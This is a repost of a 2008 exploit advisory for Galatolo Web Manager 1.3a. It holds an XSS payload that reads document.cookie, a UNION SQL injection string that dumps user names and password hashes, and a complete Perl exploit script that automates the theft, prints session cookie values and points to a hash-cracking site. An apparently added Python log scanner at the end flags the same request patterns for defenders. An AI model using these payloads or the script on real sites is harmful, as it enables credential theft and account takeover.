
    Galatolo Web Manager 1.3a

    Posted by: 午夜收音机 | Posted on: 2025-6-28 22:48 | Views: 105 | Comments: 0

    --== ============================================================================ ==--
    --==    Galatolo Web Manager 1.3a <= XSS / Remote SQL Injection Vulnerability     ==--   
    --== ============================================================================ ==--

  • Discovered By: StAkeR ~ StAkeR@hotmail.it
    [ ] Discovered On: 14 Jul 2008
    [ ] Download: http://gwm.dev-area.org/view.php?id=8

  • Vulnerabilities:

  • XSS <= 1.3a
    [ ] all.php?tag= [Code Javascript]
    [ ] http://site.com/all.php?tag=<script>alert(document.cookie)</script>

  • SQL (plugin users) 1.3a
    [ ] plugins/users/index.php?id= [Code SQL]
    [ ] -1 union select null,concat(user,0x3a,pass),null,concat(user(),0x3a,database(),0x3a,version()) from users where id=1--

  • Exploit:

    #!/usr/bin/perl
    use strict;
    use LWP::UserAgent;

    my $host = shift;
    my ($start,$content,@login);
    my $evilxx = "/plugins/users/index.php?id=-1 union select 1,concat(0x25,user,0x25,pass),null,null from users where id=1--";

    if($host =~ /^http:\/\/?/i)
    {
       $start = new LWP::UserAgent or die "[ ] Unable to connect\n";
       $start->timeout(1);
       $start->agent("Mozilla/4.0 (compatible; Lotus-Notes/5.0; Windows-NT)");
       $content = $start->get($host.$evilxx);
      
       if($content->is_success)
       {
         if($content->content =~ /%(. ?)%([0-9a-f]{32})/)
         {
           push(@login,$1,$2);
           print "[ ] Login:\n";
           print "[ ] Username: $login[0]\n";
           print "[ ] Password: $login[1]\n\n";
          
           print "[ ] Cookie Session:\n";
           print "[ ] gwm_user = $login[0]\n";
           print "[ ] gwm_pass = $login[1]\n\n";
          
           print "[ ] Crack Password:\n";
           print "[ ] md5(md5(password)) for crack:\n";
           print "[ ] http://passcracking.com\n";
         }
         else
         {
           print "[ ] Exploit Failed\n";
           print "[ ] Site Not Vulnerable\n";
         }
       }
    }
    else
    {
       print "[ ] Galatolo Web Manager (plugin users) 1.3 Remote SQL Injection\n";
       print "[ ] Exploit Coded By: StAkeR ~ StAkeR\@hotmail.it\n\n";
       print "[ ] Usage: Perl $0 <host>\n";
       print "[ ] Usage: Perl $0 http://site.com\n";
    }

    Source: https://www.jb51.net/hack/5687.html
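
For reviewing web server logs of a site running this plugin, the following is an added example (not part of the original advisory or its exploit) that flags requests matching the two patterns described above: a non-numeric `id` on `plugins/users/index.php` and markup characters in `tag` on `all.php`. It assumes access logs with the request line and status in Common/Combined Log Format, that legitimate `id` values are plain integers and legitimate tags contain no quotes or angle brackets; the function names and sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Client address, request target and status from a Common/Combined Log Format line.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (.*?) HTTP/[\d.]+" (\d{3}) ')
MARKUP_RE = re.compile("[<>\"']")  # characters that should not appear in a tag name

def classify(target):
    """Return a finding label for a request target, or None if it looks normal."""
    parts = urlsplit(target)
    # parse_qs percent-decodes values, so encoded payloads are checked in clear form.
    params = parse_qs(parts.query, keep_blank_values=True)
    if parts.path.endswith("/plugins/users/index.php"):
        # Assumption: a legitimate id is a plain integer; anything else is suspect.
        if any(not re.fullmatch(r"\d+", v) for v in params.get("id", [])):
            return "sqli:users-plugin-id"
    if parts.path.endswith("/all.php"):
        if any(MARKUP_RE.search(v) for v in params.get("tag", [])):
            return "xss:all-tag"
    return None

def scan(lines):
    """Return (client, status, label) for every log line that matches a rule."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a parseable access-log line
        label = classify(m.group(2))
        if label:
            findings.append((m.group(1), m.group(3), label))
    return findings

# Constructed sample lines using documentation address ranges.
SAMPLE_LOG = [
    '192.0.2.10 - - [14/Jul/2008:10:00:00 +0000] "GET /plugins/users/index.php?id=3 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [14/Jul/2008:10:00:05 +0000] "GET /plugins/users/index.php?id=-1%20union%20select%20null,null,null,null-- HTTP/1.1" 200 734 "-" "Mozilla/4.0"',
    '203.0.113.5 - - [14/Jul/2008:10:00:09 +0000] "GET /all.php?tag=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 901 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [14/Jul/2008:10:00:12 +0000] "GET /all.php?tag=news HTTP/1.1" 200 640 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for client, status, label in scan(SAMPLE_LOG):
        print(client, status, label)
```

A hit with status 200 on the `id` rule is worth following up by checking whether the response body contained account data, since the advisory states the stored hash doubles as the `gwm_pass` cookie value.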